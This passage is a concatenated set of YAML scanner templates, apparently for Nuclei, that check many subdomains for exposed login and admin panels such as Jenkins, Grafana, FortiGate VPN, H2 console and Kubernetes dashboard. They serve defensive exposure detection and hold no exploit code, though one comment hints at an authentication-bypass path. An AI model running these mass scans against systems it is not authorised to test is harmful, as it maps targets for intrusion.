6 | severity: info
7 | tags: panel,ems
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /EMSWebClient/Login.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 |
26 | - type: word
27 | words:
28 | - "EMS Web Client - Login"
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/entrust-identityguard-1.yaml:
--------------------------------------------------------------------------------
1 | id: identityguard-selfservice-entrust 1
2 |
3 | info:
4 | name: IdentityGuard Self-Service by Entrust
5 | author: nodauf
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /IdentityGuardSelfService/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: dsl
24 | dsl:
25 | - "contains(body,'IdentityGuard Self-Service')"
26 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/entrust-identityguard-2.yaml:
--------------------------------------------------------------------------------
1 | id: identityguard-selfservice-entrust 2
2 |
3 | info:
4 | name: IdentityGuard Self-Service by Entrust
5 | author: nodauf
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /IdentityGuardSelfService/images/favicon.ico HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: dsl
24 | dsl:
25 | - "(\"-1060264737\" == mmh3(base64_py(body)))"
26 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/exposed-pagespeed-global-admin.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-pagespeed-global-admin
2 |
3 | info:
4 | name: Apache PageSpeed Global Admin Dashboard Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /pagespeed_admin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Pagespeed Admin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/exposed-webalizer.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-webalizer
2 |
3 | info:
4 | name: Publicly exposed Webalizer Interface
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /webalizer/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Webalizer Version"
24 | - "Usage statistics for"
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/flink-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: flink-exposure
2 |
3 | info:
4 | name: Apache Flink Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - 'Apache Flink Web Dashboard'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/fortinet-fortigate-panel.yaml:
--------------------------------------------------------------------------------
1 | id: fortinet-fortigate-panel
2 |
3 | info:
4 | name: Fortinet FortiGate SSL VPN Panel
5 | author: bsysop
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /remote/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "/remote/fgt_lang"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/github-enterprise-detect.yaml:
--------------------------------------------------------------------------------
1 | id: github-enterprise-detect
2 |
3 | info:
4 | name: Detect Github Enterprise
5 | author: ehsahil
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /login HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "GitHub · Enterprise"
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/gitlab-detect.yaml:
--------------------------------------------------------------------------------
1 | id: gitlab-detect
2 |
3 | info:
4 | name: Detect Gitlab
5 | author: ehsahil
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /users/sign_in HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'GitLab'
25 | - 'https://about.gitlab.com'
26 |
27 | - type: status
28 | status:
29 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/globalprotect-panel-1.yaml:
--------------------------------------------------------------------------------
1 | id: globalprotect-panel 1
2 |
3 | info:
4 | name: PaloAlto Networks GlobalProtect Panel
5 | author: organiccrap
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /global-protect/login.esp HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "GlobalProtect Portal"
24 | - "Invalid parameters"
25 | condition: or
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/globalprotect-panel-2.yaml:
--------------------------------------------------------------------------------
1 | id: globalprotect-panel 2
2 |
3 | info:
4 | name: PaloAlto Networks GlobalProtect Panel
5 | author: organiccrap
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /sslmgr HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "GlobalProtect Portal"
24 | - "Invalid parameters"
25 | condition: or
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/glpi-login-1.yaml:
--------------------------------------------------------------------------------
1 | id: glpi-login 1
2 |
3 | info:
4 | name: GLPI - Аутентификация
5 | author: dhiyaneshDk
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/7002
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 | matchers:
22 | - type: word
23 | words:
24 | - 'GLPI - Аутентификация'
25 | - 'GLPI Copyright'
26 | condition: and
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/glpi-login-2.yaml:
--------------------------------------------------------------------------------
1 | id: glpi-login 2
2 |
3 | info:
4 | name: GLPI - Аутентификация
5 | author: dhiyaneshDk
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/7002
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /glpi/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 | matchers:
22 | - type: word
23 | words:
24 | - 'GLPI - Аутентификация'
25 | - 'GLPI Copyright'
26 | condition: and
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/go-anywhere-client.yaml:
--------------------------------------------------------------------------------
1 | id: go-anywhere-client
2 |
3 | info:
4 | name: GoAnywhere client login detection
5 | author: iamthefrogy
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /webclient/Login.xhtml HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Powered by GoAnywhere"
24 | - "GoAnywhere.com"
25 | condition: or
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/grafana-detect.yaml:
--------------------------------------------------------------------------------
1 | id: grafana-detect
2 |
3 | info:
4 | name: Grafana panel detect
5 | author: organiccrap
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /login HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Grafana"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/grails-database-admin-console-1.yaml:
--------------------------------------------------------------------------------
1 | id: grails-database-admin-console 1
2 |
3 | info:
4 | name: Grails database admin console
5 | author: emadshanab
6 | severity: medium
7 | tags: grails,panel
8 | reference: https://www.acunetix.com/vulnerabilities/web/grails-database-console/
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /dbconsole/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 | matchers:
22 | - type: word
23 | words:
24 | - "H2 Console"
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/grails-database-admin-console-2.yaml:
--------------------------------------------------------------------------------
1 | id: grails-database-admin-console 2
2 |
3 | info:
4 | name: Grails database admin console
5 | author: emadshanab
6 | severity: medium
7 | tags: grails,panel
8 | reference: https://www.acunetix.com/vulnerabilities/web/grails-database-console/
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /h2-console/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 | matchers:
22 | - type: word
23 | words:
24 | - "H2 Console"
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/hadoop-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: hadoop-exposure
2 |
3 | info:
4 | name: Apache Hadoop Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /dfshealth.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - 'Hadoop
'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/hivemanager-login-panel.yaml:
--------------------------------------------------------------------------------
1 | id: hivemanager-login-panel
2 | info:
3 | name: HiveManager Login panel
4 | author: binaryfigments
5 | severity: info
6 | tags: panel
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /hm/login.action HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - "HiveManager Login"
24 | - type: status
25 | status:
26 | - 200
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/hmc-hybris-panel-1.yaml:
--------------------------------------------------------------------------------
1 | id: hmc-hybris-panel 1
2 |
3 | info:
4 | name: SAP Hybris Management Console
5 | author: dogasantos
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /hmc/hybris HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "hybris Management Console"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/hmc-hybris-panel-2.yaml:
--------------------------------------------------------------------------------
1 | id: hmc-hybris-panel 2
2 |
3 | info:
4 | name: SAP Hybris Management Console
5 | author: dogasantos
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /hybris/hmc/hybris HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "hybris Management Console"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/identityguard-selfservice-entrust.yaml:
--------------------------------------------------------------------------------
1 | id: identityguard-selfservice-entrust
2 |
3 | info:
4 | name: IdentityGuard Self-Service by Entrust
5 | author: nodauf
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /IdentityGuardSelfService/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "IdentityGuard Self-Service"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jenkins-login.yaml:
--------------------------------------------------------------------------------
1 | id: jenkins-login
2 |
3 | info:
4 | name: Jenkins Login
5 | author: pdteam
6 | severity: info
7 | tags: panel,jenkins
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /login HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Sign in [Jenkins]'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jfrog.yaml:
--------------------------------------------------------------------------------
1 | id: jfrog-login
2 |
3 | info:
4 | name: JFrog Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6797
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /ui/login/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'JFrog'
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jira-detect-1.yaml:
--------------------------------------------------------------------------------
1 | id: jira-detect 1
2 |
3 | info:
4 | name: Detect Jira Issue Management Software
5 | author: pdteam,philippedelteil
6 | severity: info
7 | tags: panel,jira
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /secure/Dashboard.jsp HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Project Management Software"
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jira-detect-2.yaml:
--------------------------------------------------------------------------------
1 | id: jira-detect 2
2 |
3 | info:
4 | name: Detect Jira Issue Management Software
5 | author: pdteam,philippedelteil
6 | severity: info
7 | tags: panel,jira
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /jira/secure/Dashboard.jspa HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Project Management Software"
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jira-detect-3.yaml:
--------------------------------------------------------------------------------
1 | id: jira-detect 3
2 |
3 | info:
4 | name: Detect Jira Issue Management Software
5 | author: pdteam,philippedelteil
6 | severity: info
7 | tags: panel,jira
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /login.jsp HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Project Management Software"
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jiva-admin-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: active-admin-exposure
2 |
3 | info:
4 | name: ActiveAdmin Admin Dasboard Exposure
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 | #Try This /admin;/main.jsp
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/login.jsp HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "Jive Administration Console"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jmx-console.yaml:
--------------------------------------------------------------------------------
1 | id: jmx-console
2 | info:
3 | name: JMX Console
4 | author: yashanand155
5 | severity: low
6 | tags: panel,jmx
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /jmx-console/ HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
19 | matchers:
20 | - type: word
21 | words:
22 | - JBoss JMX Management Console
23 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/joomla-panel.yaml:
--------------------------------------------------------------------------------
1 | id: joomla-panel
2 |
3 | info:
4 | name: Joomla Panel
5 | author: its0x08
6 | severity: info
7 | tags: panel,joomla
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /administrator/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - ''
24 | - '/administrator/templates/isis/images/joomla.png'
25 | condition: or
26 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/kafka-connect-ui.yaml:
--------------------------------------------------------------------------------
1 | id: kafka-connect-ui
2 |
3 | info:
4 | name: Apache Kafka Connect UI Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,kafka
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - 'Kafka Connect UI'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/kafka-monitoring.yaml:
--------------------------------------------------------------------------------
1 | id: kafka-monitoring
2 |
3 | info:
4 | name: Apache Kafka Monitor Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,kafka
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - '>KafkaMonitor'
24 | - '>Kafka Monitor GUI'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/kafka-topics-ui.yaml:
--------------------------------------------------------------------------------
1 | id: kafka-topics-ui
2 |
3 | info:
4 | name: Apache Kafka Topics UI Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,kafka
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - 'Kafka Topics UI - Browse Kafka Data'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/key-cloak-admin-panel-2.yaml:
--------------------------------------------------------------------------------
1 | id: key-cloak-admin-panel 2
2 |
3 | info:
4 | name: Keycloak Admin Panel
5 | author: incogbyte,righettod
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /auth/admin HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - ""
24 | - "keycloak"
25 | part: body
26 | condition: or
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/key-cloak-admin-panel.yaml:
--------------------------------------------------------------------------------
1 | id: key-cloak-admin-panel 1
2 |
3 | info:
4 | name: Keycloak Admin Panel
5 | author: incogbyte,righettod
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /auth/admin/master/console/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - ""
24 | - "keycloak"
25 | part: body
26 | condition: or
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/kronos-workforce-central.yaml:
--------------------------------------------------------------------------------
1 | id: kronos-workforce-central
2 |
3 | info:
4 | name: Kronos Workforce Central Panel
5 | author: emadshanab
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /wfc/portal HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - 'Kronos Workforce Central'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/kubernetes-dashboard.yaml:
--------------------------------------------------------------------------------
1 | id: kubernetes-dashboard
2 |
3 | info:
4 | name: Kubernetes Console Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,kubernetes,devops
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Kubernetes Dashboard"
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/lancom-router-panel.yaml:
--------------------------------------------------------------------------------
1 | id: lancom-router-panel
2 |
3 | info:
4 | name: Lancom Router Panel
5 | author: __Fazal
6 | severity: info
7 | tags: panel,lancom
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 |
26 | - type: word
27 | words:
28 | - "LANCOM 1790VA-4G"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/livezilla-login-panel.yaml:
--------------------------------------------------------------------------------
1 | id: livezilla-login-panel
2 |
3 | info:
4 | name: Livezilla login detect
5 | author: __Fazal
6 | severity: info
7 | tags: panel,livezilla
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /mobile/index.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 |
26 | - type: word
27 | words:
28 | - 'LiveZilla'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/manage-engine-admanager-panel.yaml:
--------------------------------------------------------------------------------
1 | id: manage-engine-admanager-panel
2 |
3 | info:
4 | name: Manage Engine ADManager Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /authorization.do HTTP/1.1
18 | Host: {{Subdomains}}
